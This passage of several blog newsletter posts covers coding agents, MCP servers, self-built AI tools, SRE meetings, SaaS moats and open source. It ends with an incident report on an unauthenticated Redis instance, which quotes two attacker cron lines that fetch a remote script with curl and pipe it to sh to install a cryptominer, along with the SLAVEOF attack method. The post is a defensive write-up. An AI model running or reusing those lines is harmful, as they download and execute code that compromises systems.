Schema lives in /prisma/schema.prisma. Run `npm run db:migrate` after schema changes.

**External integrations:** Stripe in /src/integrations/stripe,
SendGrid in /src/integrations/email. Each integration has a fake for testing.

You put this in CLAUDE.md, or in a dedicated ARCHITECTURE.md that CLAUDE.md imports via @ARCHITECTURE.md.

What changes: your agent starts the session oriented. When you ask it to add a new payment method, it already knows that payment logic lives in /src/services/PaymentService, that external Stripe calls go through /src/integrations/stripe, and that services communicate through the event bus. It doesn’t need to explore your codebase to discover the architecture. It can go directly to the right place and navigate from there with LSP precision.

The GPS analogy only goes so far. A better way to think about it: LSP is your agent’s ability to look something up instantly. Semantic context is the agent knowing what to look up. Both are required. Without the map, LSP is a fast tool pointed in random directions. Without LSP, the map tells you where to go but getting there is still six minutes of grepping.

Together, your agent works the way a senior engineer works on a codebase they know well: they know the territory, they navigate precisely, and they catch their own mistakes before committing them.

The reason I keep coming back to this: the numbers suggest agents are about to do a lot more real work.

Michael Truell announced recently that Cursor now has 2x more agent users than Tab (autocomplete) users. Agent usage is up 15x in a year. More than a third of PRs merged at Cursor are created by agents running autonomously in the cloud — not a human in the loop, not autocomplete suggestions, agents doing complete pieces of work end-to-end.

If that’s the direction — and the trajectory makes it pretty clear it is — then agents navigating codebases with grep is a bottleneck at the wrong layer. You’ve solved the intelligence problem. You have an agent that can reason about complex changes across multiple files. You have not solved the navigation problem, which means the intelligence is being spent on finding things instead of changing them. It’s like hiring a brilliant architect and making them do their own filing.

LSP and semantic context are table stakes for agent-native codebases. The fact that LSP is buried in settings and semantic maps are a community pattern rather than a first-class feature is a product gap. It’ll get closed. But right now you have to close it yourself, and it takes about thirty minutes.

Set up the language server for your stack. Enable LSP in settings.json. Tell Claude to prefer it in CLAUDE.md. Write an architecture section that orients the agent in the first turn. Thirty minutes of setup for sessions that actually feel autonomous.

Your future self will be insufferably smug about having done this early. That’s a reasonable outcome.

Why Your MCP Server Will Die in Obscurity

Lakshmi Narasimhan — Thu, 26 Feb 2026 16:13:41 GMT

You built it over a weekend. The code works. Claude can technically call your tools. You added it to the config — if you’re not sure how, Stop Making Claude Code Guess covers the setup — restarted Claude Code, and — nothing. Claude doesn’t use it. Or uses it once, awkwardly, and then forgets it exists.

The problem isn’t your code. The problem is that Claude doesn’t know when to call your tools, so it doesn’t.

This is the thing nobody tells you when you’re learning MCP: the hardest part isn’t building the server. It’s making Claude reach for it.

How Claude Actually Chooses Your Tool

When you ask Claude to do something, it’s doing a matching problem. It looks at what you asked, scans the tools available to it, reads their descriptions, and decides which one — if any — fits.

That last part is the lever most developers ignore. Claude doesn’t run your code to figure out what your tool does. It reads the description you wrote and makes a judgment call. If your description is vague, generic, or poorly matched to the language your users actually use, Claude will skip your tool and try something else. Or just tell you it can’t do the thing.

Here’s a real example. Compare these two tool descriptions for the same function:

Bad: “Query the database.”
Good: “Look up a customer’s order history, subscription status, and recent activity by email address or customer ID. Use this when someone asks about a specific customer’s account.”

The first one is technically accurate. The second one is what Claude can actually match against. “What’s going on with john@example.com‘s account?” maps cleanly to the second description. It maps to nothing in the first.

Your tool description is a search index. Write it like one.

The Five Ways MCP Servers Die

1. Bad descriptions. Already covered, but it bears repeating because it’s the most common failure. Every tool, resource, and prompt deserves a description that answers: when should Claude reach for this? Include the kinds of questions or requests that should trigger it. Use the words your users actually use.

2. Too many tools. There’s a temptation to expose everything. Every database table. Every API endpoint. Every configuration option. Resist it. A server with 30 tools is a server Claude gets confused by — and it’s also a server that quietly eats your context window before you’ve typed a word (more on that problem here). It can’t reliably choose the right tool when there are 30 candidates with overlapping descriptions. The best MCP servers do one thing, maybe two, exceptionally well. If you find yourself adding a tenth tool, ask whether you’re building a server or a dumping ground.

3. Output Claude can’t reason about. Tools that return raw JSON blobs, HTML, or binary data are tools Claude struggles to use. Claude works in text. If your tool returns {"data": [{"id": 1, "val": "foo"}, ...]}, Claude has to parse that before it can think about it. If your tool returns “Found 3 orders: Order #1001 (shipped Jan 15), Order #1002 (pending), Order #1003 (refunded)”, Claude can work with that directly. Format your output for a reader, not a parser.

4. Uninstallable. Most MCP servers have no README. No install instructions. No example config. No explanation of what environment variables they need. Even if someone finds your server on GitHub, if they can’t get it running in ten minutes, they close the tab. You will never hear from them again. Distribution is half the product.

5. Solving a problem only you have. This one is uncomfortable because it’s often true. The research tool you built for your specific workflow, against your specific internal data structure, with your specific edge cases handled — it’s not a product, it’s a script. That’s fine. But don’t confuse it for something others will install. The MCP servers that spread are the ones that solve problems many developers have, in a way that requires no customization to be useful out of the box.

What Actually Works

The servers that get used share a few traits.

They have narrow scope with deep utility. Not “do 20 things mediocrely” but “do one thing so well you’d miss it if it was gone.” A good example: a server that searches Hacker News. One tool, one job — search HN, return results with scores and comment counts, formatted so Claude can reason about it immediately. That’s enough. That’s a server people actually keep installed.

They treat descriptions as product copy. Not documentation — copy. The description is the first thing Claude reads and the primary factor in whether your tool gets called. Write it for Claude the way you’d write an app store listing: what does this do, when do you need it, what does success look like.

They fail gracefully and informatively. When something goes wrong, a good tool returns “No results found for ‘X’. Try a broader search term.” A bad tool raises an exception. Claude can work with the first one. It can only apologize for the second.

They’re easy to install. One command. One config block. Clear documentation for what environment variables are needed and what they do. If setup takes more than five minutes, most people won’t finish.

The Gap This Creates

Right now, MCP is early. Most servers are weekend experiments. The production-quality servers — narrow scope, excellent descriptions, graceful error handling, easy installation — are rare.

That gap is an opportunity. A well-built MCP server that solves a real developer problem and is easy to install can spread through Claude Code users the same way good VS Code extensions did: by word of mouth, by being genuinely useful, by being the thing you’d mention in a conversation when someone complains about the problem you solved.

The window isn’t permanent. In six months, there will be a lot more competition. Right now, the bar is low enough that “works reliably and has a clear description” puts you in the top 10%.

That’s what I’m writing about in the MCP Cookbook — a practical guide to building production MCP servers for Claude Code. Not how to write an MCP server; the official docs cover that. How to write one that people actually use.

I’m writing the MCP Cookbook — a practical guide to building production MCP servers for Claude Code. Real code, real patterns, real mistakes. Subscribers get early access when it’s ready. You’re already on the list.

Subscribe now

While You Panic About AI Taking Jobs, I Built $200/Mo Tools

Lakshmi Narasimhan — Wed, 18 Feb 2026 06:09:29 GMT

I was about to click “Subscribe: $29/month” on yet another AI content tool when I stopped.

Not because $29 was a lot. I’ve subscribed to worse. I have a graveyard of forgotten SaaS products auto-renewing somewhere in my credit card statement, silently draining money for tools I used exactly twice.

No, I stopped because I realized something embarrassing.

This tool was literally just a pretty wrapper around Claude. Same AI I already pay for. Same capabilities. They’d added a nice UI, a payment form, and approximately zero additional value.

I was about to pay $29/month to rent something I could build in an afternoon.

So I closed the tab. Opened Claude Code. And two hours later, I had my own version. No usage limits. No subscription. Mine forever.

That was six months ago. Since then, I’ve built six tools. I’ve eliminated $200/month in subscriptions. And I’ve realized something that changed how I think about this whole “AI is coming for your job” panic.

Hey, I’m Lakshmi: I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Everyone’s Worried About the Wrong Thing

My LinkedIn feed is a horror show right now. Every other post is either “AI will take your job” or “Here’s how to survive the AI apocalypse” or some variation of “the robots are coming, repent.”

The advice is always the same. Learn to prompt. Adapt or die. Get your finances in order because disruption is coming.

Maybe it is. I don’t know the future any better than you do.

But here’s what I do know: while everyone’s stockpiling survival advice, I’ve been using those same AI tools to eliminate $200/month in software subscriptions. Tools I was paying for six months ago? I own them now. Forever. Zero recurring cost.

Same technology. Completely different mindset.

Let me show you what I mean.

The Batch PDF Processor I Built Instead of Uploading 50 Files

I had 50 research papers to process. Extract abstracts, pull out key findings, grab any data tables, save everything as searchable markdown.

Sure, Claude can read a PDF. One at a time. Upload, wait, copy the output, upload the next one, repeat 49 more times.

Old me would’ve done exactly that. Or Googled “batch PDF extraction tool,” found something that charges per page, done the math, decided it wasn’t worth it, and then manually uploaded 50 files anyway.

New me? I built a script.

Ninety minutes later, I had a skill that loops through a folder, extracts text and tables from each PDF using PyMuPDF, summarizes each one, and saves structured markdown files. Point it at a folder, go make coffee, come back to 50 organized summaries.

> Process all PDFs in ~/research/papers
[loops through 50 files]
[extracts + summarizes each]
[saves to ~/research/summaries/]

No uploading files one by one. No copy-paste marathon. No usage limits. Runs locally, so nothing leaves my machine.

The tool isn’t “PDF extraction”: Claude already does that. The tool is automation. Batch processing. The boring plumbing that turns a manual 3-hour task into a 5-minute one.

The Video Transcription Pipeline That Changed How I Learn

I’m an infoproduct junkie. Courses, masterclasses, workshops: if someone’s selling knowledge in video form, I’ve probably bought it. My Teachable and Gumroad purchase history is embarrassing. Hours and hours of content sitting in various dashboards, waiting to be watched.

Old me would take notes while watching. Pause, scribble, play, pause, scribble. Retain maybe 30% of it. Forget the rest within a week.

New me? I feed the videos to my video-distill skill. It transcribes everything with Whisper, distills it into readable chapters with Claude, and exports to EPUB.

Two hours of course video becomes a 12,000-word mini-book on my Kindle that I can search, highlight, and reference forever.

Build time: 2 hours.

Previous cost: $50-200 per course for transcription services (or just... not having transcripts and forgetting everything).

The ROI on courses went from “eh, probably worth it” to “this is a no-brainer.”

The Pattern Nobody Wants to Admit

Here’s what I noticed while building these:

Every AI SaaS is a thin wrapper around the same AI you already have access to.

Batch file processing? A loop + Claude.
Video transcription? Whisper + Claude.
Content research? Web fetch + Claude.
Cross-posting? Template formatting + Claude.
Writing assistant? Prompt engineering + Claude.

The “product” is convenience packaging. A nice UI, hosting, a payment gateway, customer support. Sometimes that’s worth paying for.

But most of the time? You can build 80% of what you need in under two hours.

I’ve done this six times now. Total build time: about 14 hours. One weekend, spread across a few months.

Total monthly savings: $199.

Total annual savings: $2,388.

Tools I now own forever: 6.

The Real Question Nobody’s Asking

While everyone argues about whether AI will take their job, here’s what I’m thinking:

It’s not AI vs humans. It’s humans with AI vs humans without.

The lawyer who refuses to use AI for contract review loses to the lawyer who uses it and handles 5x more clients.

The developer who doesn’t use AI for code generation loses to the developer who does and ships features in days instead of weeks.

The writer who thinks AI is “cheating” loses to the writer who uses it for research and drafts 10x more content.

The people who lose their jobs to AI won’t be the ones whose work AI can theoretically do.

They’ll be the ones who didn’t use AI and got outpaced by someone who did.

What I Actually Do Instead of Panicking

I audit my subscriptions. Every few months, I go through my recurring charges and ask: “Is this just an AI wrapper?”

If yes, I build a replacement. If the replacement covers 80% of my use cases, I cancel the subscription.

Here’s my current hit list:

Batch PDF processing: replaced manual uploads with pdf-reader skill (90 min)
Video transcription: replaced $50-200/course services with video-distill skill (2 hours)
Ebook formatting: replaced $30/book services with epub-builder skill (1 hour)
Content research: replaced $29/mo tools with compose skill (3 hours)
Cross-posting: replaced $50/mo tools with distribute skill (2 hours)
Writing assistant: replaced $20/mo Sudowrite etc with fiction-writer skill (4 hours)

Not everything is worth building. QuickBooks? Keep paying. Complex Zapier automation with 50 integrations? Probably keep paying. Hosted databases? Definitely keep paying.

But simple AI wrappers that just call Claude with a prompt and charge you monthly for it? Those are dying. You can own that.

This Is What Leverage Actually Looks Like

When you own your tools, you can modify them to fit your exact workflow. Combine them in ways SaaS products can’t. Build competitive advantages nobody else has.

My distribute skill cross-posts to five platforms in one command. Most people manually post to each: different formatting, different copy, different everything. That’s 30 minutes per post. I do it in 2 minutes.

Over a year, that’s 50+ hours saved. For one skill.

My video-distill skill turns courses into searchable mini-books. Most people watch courses once and forget 80% of it. I have permanent reference material I can search and review anytime.

This is how one-person operations beat ten-person teams. Not by working harder. By owning tools that make you 10x faster.

Two Paths

The AI revolution is here. Not coming. Here.

Path A: Read about how AI is going to disrupt your career. Worry about it. Prepare for the worst. Maybe it happens, maybe it doesn’t. Either way, you spent months anxious instead of building.

Path B: Use AI to eliminate expenses, build tools, ship faster, own your stack. If disruption comes, you’re already leveraged. If it doesn’t, you still saved $2,400/year and got 10x faster.

I’m on Path B.

I built six skills in 14 hours. I save $200/month. I own tools that do exactly what I need, with no usage limits, no pricing tiers, and no risk of some startup getting acqui-hired and shutting down my workflow.

And I’m shipping four SaaS products while working two day jobs, because I have the leverage to do it.

You can panic, or you can build.

I’m building.

If You Want to Start

Here’s the playbook I use every time.

Step 1: Pick Your Target

Start with something you use weekly but don’t need enterprise features for. The sweet spot is tools where you’re paying for convenience, not capability.

Good first targets:

Batch processing workflows (loop through files, process each, save outputs)
Video/audio transcription (Whisper is free and runs locally)
Content research and brainstorming (web scraping + Claude)
Grammar/style checking (Claude prompts replace Grammarly)
Format conversion pipelines (markdown → EPUB, video → transcript → summary)

Bad first targets:

Accounting software (compliance, integrations, audit trails)
Complex multi-step automation with 20+ triggers
Anything requiring hosted infrastructure you don’t want to manage
Real-time collaboration tools (Google Docs, Figma)

Step 2: Describe the Workflow, Not the Tool

Don’t say “build me a transcription tool.” Say “I have 20 course videos. I want to transcribe each one, distill the key points, and save them as markdown files organized by chapter.”

The more specific you are about your actual workflow, the better the tool fits. You’re not building a generic SaaS: you’re building exactly what you need.

Step 3: Start Ugly, Iterate Fast

Your first version will be rough. That’s fine.

My video transcription pipeline started as a janky script that choked on long files. I fixed the edge cases as I hit them. Now it handles 3-hour lectures without breaking a sweat.

Don’t try to build the polished SaaS version. Build the “works for my specific use case” version. That takes 90 minutes, not 90 days.

Step 4: The 80% Test

Run your homegrown tool alongside the paid one for 30 days. Track when you reach for the paid tool instead.

If your skill handles 80% of cases, cancel the subscription. The remaining 20%? Either iterate on your skill or accept the occasional manual workaround.

Perfect is the enemy of $X/month forever.

Step 5: Compound It

Once you’ve built one, you’ll notice patterns. The same techniques: file handling, API calls, text processing, output formatting: show up everywhere.

Your second skill takes half the time. Your fifth takes 20 minutes.

This is how you end up owning your entire stack without spending months building it.

The Prompt That Starts Everything

If you’re using Claude Code or similar:

I want to build a tool that [specific workflow].
I currently do this by [current manual process or paid tool].
My input is [what you're working with].
I want the output to be [format and destination].
What's the simplest way to build this?

Then iterate. The AI will ask clarifying questions, suggest approaches, write code. You test, refine, test again.

Two hours later, you own something you would’ve rented forever.

The people who win the next decade won’t be the ones who worried about AI disruption.

They’ll be the ones who used AI to build tools, eliminate costs, and move faster than everyone else.

Don’t rent your stack. Own it.

P.S.: The AI wrapper economy is dying. Every “AI-powered” tool that’s just a UI around Claude or GPT is on borrowed time. The moment users realize they can build 80% of that themselves, the subscription revenue evaporates. If you’re building an AI SaaS, make sure your value is in the 20% that can’t be replicated in two hours.

How to Escape the SRE Meeting-Industrial Complex

Lakshmi Narasimhan — Wed, 11 Feb 2026 15:46:25 GMT

Monday morning. I opened Slack at 8:30. By 8:47 I had four meeting invites: a standup, a sync, a pre-mortem for a system that hasn’t broken yet, and a “quick alignment call” about the alignment call we had on Friday.

By 11am I’d spent two and a half hours talking about reliability. I’d spent zero hours improving it.

Someone on r/devops posted this week: “My team should be renamed to TalkOps.” Ninety-nine percent upvote ratio. Every SRE on the planet felt that in their chest.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

The Meeting-Industrial Complex

Here’s what happens in platform engineering and SRE orgs at scale. The work is invisible. Nobody sees the deployment pipeline until it breaks. Nobody notices the monitoring until it doesn’t fire. The only proof that your team exists is... meetings.

So meetings multiply. Not because they’re useful, but because they’re visible. Your manager needs to justify headcount. Your team needs to “align” with five other teams. Every incident spawns a post-mortem, every post-mortem spawns action items, every action item spawns a planning meeting, and the planning meeting spawns a follow-up sync to check on the action items from the post-mortem about the incident that happened because nobody had time to do deep work because they were in too many meetings.

The recursion is beautiful, in a terrible way.

Deep Work Is the Actual Product

I’ve been a Principal SRE for long enough to have an opinion that would get me in trouble at most companies: most reliability improvements happen in 2-hour blocks of uninterrupted focus, not in 30-minute standups.

The monitoring rule that catches the subtle memory leak? That took a quiet afternoon staring at Grafana dashboards. The deployment pipeline fix that cut rollback time from 20 minutes to 90 seconds? That was a Saturday morning when Slack was silent.

The real work — the stuff that actually moves your error budget in the right direction — requires the kind of concentration that evaporates the instant someone says “can I get 15 minutes?”

Fifteen minutes is never fifteen minutes. It’s five minutes of context-switching in, fifteen minutes of meeting, and thirty minutes of trying to remember what you were doing before the meeting. That’s fifty minutes gone for fifteen minutes of “alignment.”

The Side Project Tax

Here’s where it gets personal. If you’re an SRE who also builds on the side — SaaS, open source, writing, whatever — the meeting-industrial complex doesn’t just eat your work day. It eats your creative energy.

I leave my day job some days having produced nothing but words. Spoken words. Words in Zoom calls. Words in Slack threads about Zoom calls. By the time I sit down to work on my own projects, my brain is cooked.

Not tired-from-solving-hard-problems cooked. Tired-from-performing-productivity cooked. There’s a difference. One is the good kind of exhaustion. The other is the kind where you stare at your side project and think “I’ll just do this tomorrow” for the 47th consecutive day.

The cruel irony: the skills that make you good at SRE — systems thinking, pattern recognition, automation instinct — are exactly the skills you need for building products. But TalkOps burns through your cognitive budget before you can apply those skills to anything that’s actually yours.

Fighting Back (Without Getting Fired)

You can’t just decline every meeting. I’ve tried. People notice. “Not a team player” shows up in your review. The trick is strategic visibility reduction.

1. The Async Post-Mortem

Most post-mortems don’t need a meeting. They need a document. Write the timeline, the root cause, the action items. Share it. Let people comment asynchronously. Reserve the live meeting for cases where there’s genuine disagreement about the fix.

I started doing this two years ago. Saved roughly 3 hours a week. Nobody complained. Several people thanked me.

2. The Office Hours Model

Instead of being available for “quick syncs” all day, block two hours for office hours. “Need my input? Come between 2-4pm Tuesday and Thursday.” Outside those hours, I’m heads-down. Slack messages get a response within 4 hours, not 4 minutes.

This feels rude until you realize that every senior engineer at a company like Google does exactly this. They just don’t announce it.

3. The 1-Page RFC

Half the planning meetings exist because nobody wrote down what they want to build. A 1-page RFC — problem, proposed solution, tradeoffs, timeline — kills 3 meetings. Write it before the meeting gets scheduled. Share it. Cancel the meeting. “I think the RFC covers it. Drop comments if anything’s unclear.”

4. Protect Your First 2 Hours

No meetings before 10:30. Not negotiable. Those first morning hours are when your brain is sharpest. Using them for standups is like using a surgical laser to heat soup.

If your standup is at 9am, that’s not a standup. That’s a productivity assassination. Push for async standups (Slack bots work fine) or at least move it to after lunch when everyone’s already in low-focus mode.

5. Make the Work Visible Without Meetings

The root cause of TalkOps is invisible work. Fix the visibility problem and you fix the meeting problem.

Weekly automated reports. Dashboards in shared channels. Monthly “here’s what platform eng shipped” newsletters. Make the work visible on your terms, in your format, on your schedule. If people can see what you’re doing, they stop scheduling meetings to ask.

The Real Output

Every hour you reclaim from TalkOps is an hour you can spend on actual reliability work. Or actual side project work. Or actual thinking, which is the scarcest resource in any engineering organization.

The r/devops thread had a comment that stuck with me: “By the time I get a quiet hour, I’m already drained.”

That’s not a scheduling problem. That’s a systems problem. And if there’s one thing SREs should be good at, it’s fixing systems.

Start with your own calendar.

The Real SaaS Moat AI Can't Replicate

Lakshmi Narasimhan — Mon, 09 Feb 2026 14:00:53 GMT

There’s a comment buried 14 levels deep in this Hacker News thread about AI killing B2B SaaS. It has 37 upvotes and it’s the smartest thing I’ve read this year.

Here it is, paraphrased: “The real innovation of SaaS was laundering inaccessible open-source software into a format that doesn’t require transiting git. The hard part was never the code. The hard part was that git sucks.”

I laughed. Then I stopped laughing because it’s devastatingly correct.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

The Git Laundering Machine

Think about the most profitable SaaS businesses in technology. Seriously, list them.

AWS? That’s Linux, KVM, and Xen behind a billing dashboard. Heroku was git-push-to-deploy because deploying was too hard. Vercel is the same thing for Next.js. MongoDB Atlas is MongoDB without the ops. Redis Cloud is Redis without the YAML. Supabase is Postgres without the DBA.

Every single one of them is a factory that converts something freely available on GitHub into something you can pay for on a website.

The commenter was right. These companies didn’t build moats with proprietary technology. They built moats by standing between users and git. Their value proposition, stripped to the studs, is: “You don’t have to clone a repo.”

That’s a $500 billion industry built on the fact that git clone is scary.

LLMs Just Killed the Middleman

Here’s where the “AI is killing SaaS” thesis gets real.

When a CTO says “can we build this internally?”, the old answer was: “Technically yes, but you’d need 3 engineers, 6 months, and ongoing maintenance. Just buy the SaaS.”

The new answer: “ChatGPT set it up in 20 minutes. It reads from the same open-source code the SaaS vendor uses. It runs on our infrastructure. There’s no monthly bill.”

LLMs do exactly what SaaS companies do — they take inaccessible open-source software and make it usable by normal humans. They just skip the subscription.

The git laundering machine now has competition. And the competitor works for free.

What Actually Survives

So is B2B SaaS dead? No. But the moat map just got redrawn.

Here’s what doesn’t survive: any SaaS whose primary value is “we set it up so you don’t have to.” Deployment wrappers, config GUIs, managed hosting for commodity databases — all of this is getting compressed.

An HN commenter who manages teams put it bluntly: “Management doesn’t want to be responsible for bespoke internal tools.” That’s real. But it’s a shrinking moat. Today’s management doesn’t want to be responsible. Tomorrow’s management grew up with ChatGPT and doesn’t see internal tooling as risky.

Here’s what survives:

Data. If your SaaS accumulates proprietary data over time — customer behavior patterns, industry benchmarks, network effects — that’s a moat AI can’t replicate. A new LLM-generated tool starts with zero data. Your SaaS has three years of it.

Compliance and trust. SOC 2, HIPAA, GDPR certification takes time and money. “ChatGPT built it” doesn’t pass an enterprise security audit. Yet.

Workflow lock-in. Not the software itself, but the habits. Slack isn’t hard to replace technically. It’s hard to replace because your whole company’s muscle memory lives there.

Network effects. Figma isn’t valuable because of the rendering engine. It’s valuable because your designers, developers, and product managers are all in the same file. That’s a moat no amount of vibe coding can replicate.

The specification itself. Here’s the contrarian take within the contrarian take: as code becomes commodity, the spec becomes the product. The companies that survive aren’t the ones that write the best code. They’re the ones that understand the problem deeply enough to specify what “right” looks like. Everyone else is just a GPT wrapper with a landing page.

The Indie SaaS Playbook Changes

If you’re building SaaS solo — and if you’re reading this newsletter, you probably are — the implications are brutal and clear.

Full disclosure: I built a product that does exactly this. Supabyoi deploys Supabase for you. By my own thesis, that’s a shrinking moat. I’m writing this post partly because I’m living the question: evolve or get compressed.

Stop building tools. Start building data flywheels.

A CRUD app with a nice UI is now a weekend project for anyone with ChatGPT. A system that gets smarter with every user interaction is still a real business.

Stop selling setup. Start selling ongoing value.

“We deploy Postgres for you” is dying. “We analyze your Postgres performance patterns across 10,000 databases and tell you what’s about to break” is thriving.

Stop competing on features. Start competing on understanding.

The SaaS products that survive AI commodification will be the ones that understand their customers’ problems better than a general-purpose LLM ever could. Domain expertise is the last moat.

The $500 Billion Question

The HN thread devolved into the usual “AI is overhyped” vs. “AI changes everything” tribal warfare. But that one comment, buried 14 levels deep, cut through all of it.

The SaaS moat was never the software. It was the fact that software was hard to access. That moat is evaporating.

What’s left is data, trust, network effects, and deep domain understanding.

Build your SaaS around those. Or enjoy competing with a free chatbot.

Open Source Is Starving While AI Makes Coding Free

Lakshmi Narasimhan — Tue, 03 Feb 2026 12:42:04 GMT

Developer costs are plummeting toward zero. AI coding agents can scaffold an app in minutes. A solo founder with Claude can ship what used to take a team of five.

And yet, open source is in crisis.

Maintainers are burning out at record rates. Critical infrastructure projects survive on the goodwill of one or two exhausted volunteers. The xz backdoor wasn’t an anomaly — it was a symptom of a system running on fumes. The “one random person in Nebraska” meme stopped being funny years ago.

We have the cheapest labor in the history of software, and the projects that hold up the internet are still starving for contributors.

How?

Hey, I’m Lakshmi — a Principal SRE building SaaS products on the side. I write about what actually works when you’re shipping solo.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

The Founding Myth

In 1997, Eric Raymond published The Cathedral and the Bazaar, the essay that became open source’s origin story. The argument was simple: software built like a cathedral — centrally planned, tightly controlled, released when perfect — loses to software built like a bazaar — messy, open, iterated in public by a swarm of contributors.

Linux beat the cathedral. The bazaar won. Raymond’s most famous line became gospel: “Given enough eyeballs, all bugs are shallow.”

Twenty-nine years later, the eyeballs are disappearing. The bazaar is starving. And a new kind of cathedral has risen — one Raymond never imagined.

Cheap Labor Doesn’t Flow to Maintenance

Here’s the disconnect: AI-generated labor isn’t flowing to maintenance. It’s flowing to creation.

Vibe coding doesn’t fix bugs in abandoned logging libraries. It generates new apps. Agents build what they’re told, and nobody tells them “go triage issues on this unglamorous project that 40,000 packages depend on.”

Raymond’s bazaar worked because contributors had intrinsic motivation — they scratched their own itch. Agents don’t have itches. They have prompts.

The result: an explosion of new software built on a foundation that’s slowly rotting.

Linus’s Law Is Breaking

Raymond’s key insight was that open development creates a natural immune system. Bugs get caught because many eyes are watching. The bazaar is self-correcting.

This assumed two things that were true in 1997 and are increasingly false today:

First, that someone wrote the code. Vibe-coded software often has no human author who deeply understands it. The person who prompted it into existence may not be able to read it. The “author” is a model trained on the commons, producing plausible-looking code that works until it doesn’t. I’ve written about this failure mode — code that compiles, passes tests, and is subtly, catastrophically wrong.

Second, that someone reads the code. Open source review depends on humans who care enough to look. But when code is generated at machine speed, the review bottleneck becomes catastrophic. Maintainers are already drowning in AI-generated pull requests — superficially clean, structurally hollow. The immune system is being overwhelmed not by attackers, but by well-meaning slop.

“Given enough eyeballs, all bugs are shallow” only works if the eyeballs are open.

The New Cathedral

Raymond’s cathedral was Microsoft. Proprietary, closed, top-down. The bazaar beat it because openness was a structural advantage — more contributors, faster iteration, better feedback loops.

But look at what the bazaar runs on today.

Every vibe coder, every AI-assisted open source contributor, every agent spinning up code in a terminal — they’re all downstream of foundation models built inside the most cathedral-like institutions imaginable. Anthropic, OpenAI, Google DeepMind — these are cathedrals that would make 1990s Microsoft blush. Billions in compute, proprietary training data, closed weights, trade secrets wrapped in safety rhetoric.

The bazaar didn’t defeat the cathedral. It moved in upstairs.

Open source in 2026 means building with tools you can’t inspect, trained on data you can’t audit, controlled by companies whose incentives you can’t verify. The irony would make Raymond’s head spin: the most “open” era of software creation runs entirely on the most closed infrastructure ever built.

Vibe Coding: Raymond’s Dream or Nightmare?

“Release early, release often.” Raymond preached this as the bazaar’s core advantage. Vibe coding takes it to its logical extreme — release in minutes, iterate in seconds, ship before lunch.

But Raymond’s version had a crucial qualifier nobody quotes: rapid releases were supposed to come with listening to your users. The feedback loop was the point. Ship fast so you can learn fast.

Vibe coding often skips the loop. Ship fast because shipping is easy. If it breaks, generate a new one. Software becomes disposable. Why debug when you can re-prompt?

This creates a bizarre inversion. The original bazaar was messy but convergent — many contributors pushing toward better software over time. The vibe-coded bazaar is messy and divergent — infinite forks, infinite rewrites, nothing accumulating into lasting infrastructure.

Raymond imagined a thousand people improving one thing. We got one person generating a thousand things.

Does Open Source Even Matter the Same Way?

Here’s the uncomfortable question: if anyone can vibe-code a replacement for your library in an afternoon, what does “open source” even mean?

The traditional argument was access. You shouldn’t have to pay Microsoft for a compiler. You shouldn’t be locked into Oracle’s database. Open source was freedom from vendor dependence.

But when the vendor is an AI model and the product is generated on demand, the bottleneck shifts. You’re not locked into specific software — you’re locked into the capability to generate software. The dependency moved up a layer of abstraction.

Open source used to mean: “here’s the code, do what you want.” The new version might mean: “here’s the model weights, do what you want.” And by that standard, most of the AI industry is firmly in cathedral territory.

What Raymond Got Right (That Still Holds)

It’s tempting to write the obituary for the bazaar. Don’t.

Raymond’s deepest insight wasn’t about code — it was about coordination. The bazaar demonstrated that loose networks of motivated people could outperform rigid hierarchies. That insight is more relevant than ever.

The projects that will thrive in the agent era won’t be the ones with the most AI-generated PRs. They’ll be the ones that figure out how to coordinate human judgment with machine labor. Someone still has to decide what’s worth building. Someone still has to say “this PR is slop, reject it.” Someone still has to maintain taste.

The bazaar’s immune system isn’t dead — it just needs to evolve. Instead of “many eyes on the code,” we need “many minds on the direction.” Maintainers become curators. Contributors become reviewers. The scarce resource isn’t writing code anymore. It’s knowing which code to keep.

Raymond was right that openness wins. He was right that central planning can’t compete with distributed intelligence. He was right that scratching your own itch produces better software than building to spec.

He just couldn’t have predicted that the itch would be scratched by a machine that doesn’t know what itching feels like.

The Cathedral and the Bazaar assumed humans on both sides of the screen. We’re entering an era where that assumption breaks down. The principles survive. The implementation needs an upgrade.

What do you think — is the bazaar adapting or dying? Reply and tell me.

Your Redis Is Probably Naked Right Now

Lakshmi Narasimhan — Mon, 02 Feb 2026 04:01:11 GMT

Last month I wrote about finding a cryptominer in a client’s Kubernetes cluster. CVSS 10. Next.js RCE. Classic supply chain story. I got to play detective, feel smart, and write about it.

This month the cryptominer came for me.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

Saturday night. Tamil movie with my wife. Sentry pings: “Write against read-only replica.” Seventy-four times in two hours.

My first instinct was to ignore it. Background task failures. Probably a blip. But seventy-four errors is not a blip. That’s someone inside your house rearranging the furniture.

“Two minutes,” I told my wife. (Spoiler: It was not two minutes.)

The Dumbest Thing I’ve Done in 20 Years

I run a scheduling service — Celery task queue backed by Redis, deployed with Kamal on a Hetzner VPS. Standard solo dev stack. The kind of thing I literally help people set up.

Here’s the confession: Redis port 6379 was exposed to the public internet. No password. No authentication. For months.

I copied a deployment config. It worked. I shipped. I moved on to the next feature. Sound familiar?

An automated scanner found it. At 22:25 UTC, IP 46.19.137.194 sent a SLAVEOF command — telling my Redis to replicate from their command-and-control server. My Redis complied. For five seconds it went read-only, Celery workers started screaming, and the attacker planted two keys:

backup1: */2 * * * * root curl -fsSL http://natalstatus.org/ep9TS2/ndt.sh | sh
backup3: */4 * * * * root curl -fsSL http://103.79.77.16/ep9TS2/ndt.sh | sh

Cryptominer installation scripts. Every two minutes. On my $12/month VPS.

The payloads never made it to crontab — the attack chain didn’t complete. But they were sitting in my Redis like loaded guns.

The Twenty-Minute Fix

Remove the public port mapping. Add a password. Done.

# Before: come one, come all
redis:
  port: 6379
  cmd: redis-server --appendonly yes

# After: invitation only
redis:
